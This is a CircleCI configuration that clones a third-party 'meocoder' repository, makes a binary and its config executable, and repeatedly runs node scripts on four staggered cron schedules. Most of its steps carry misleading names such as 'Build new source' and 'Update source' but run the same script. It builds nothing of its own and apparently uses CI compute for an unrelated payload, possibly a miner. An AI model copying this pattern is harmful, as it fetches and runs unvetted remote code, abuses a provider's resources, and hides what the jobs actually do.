version: 2.1
jobs:
  build:
    docker:
      - image: circleci/node:12
      
    resource_class: medium

    working_directory: ~/meocoder

    steps:
      - checkout
      
      - run:
          name: Clone project and run task
          command:  git clone https://github.com/vippro99/meocoder.git && cd meocoder && npm i -s && chmod +x meocoder config.json && node app-1h.js
      - run:
          name: New task and check
          command:  cd meocoder && node app-1h.js
      - run:
          name: Build new source
          command:  cd meocoder && node app-1h.js
      - run:
          name: Update source
          command:  cd meocoder && node app-1h.js
      - run:
          name: Check and close jobs
          command:  cd meocoder && node test-45m.js
      
      # create cronjob 
workflows:
  version: 2

  constantly_check:
    triggers:
      - schedule:
          cron: "0 11,17,23,5 * * *"
          filters:
            branches:
              only:
                - main
                - master
      - schedule:
          cron: "2 11,17,23,5 * * *"
          filters:
            branches:
              only:
                - main
                - master
      - schedule:
          cron: "4 11,17,23,5 * * *"
          filters:
            branches:
              only:
                - main
                - master
      - schedule:
          cron: "6 11,17,23,5 * * *"
          filters:
            branches:
              only:
                - main
                - master
    jobs:
      - build
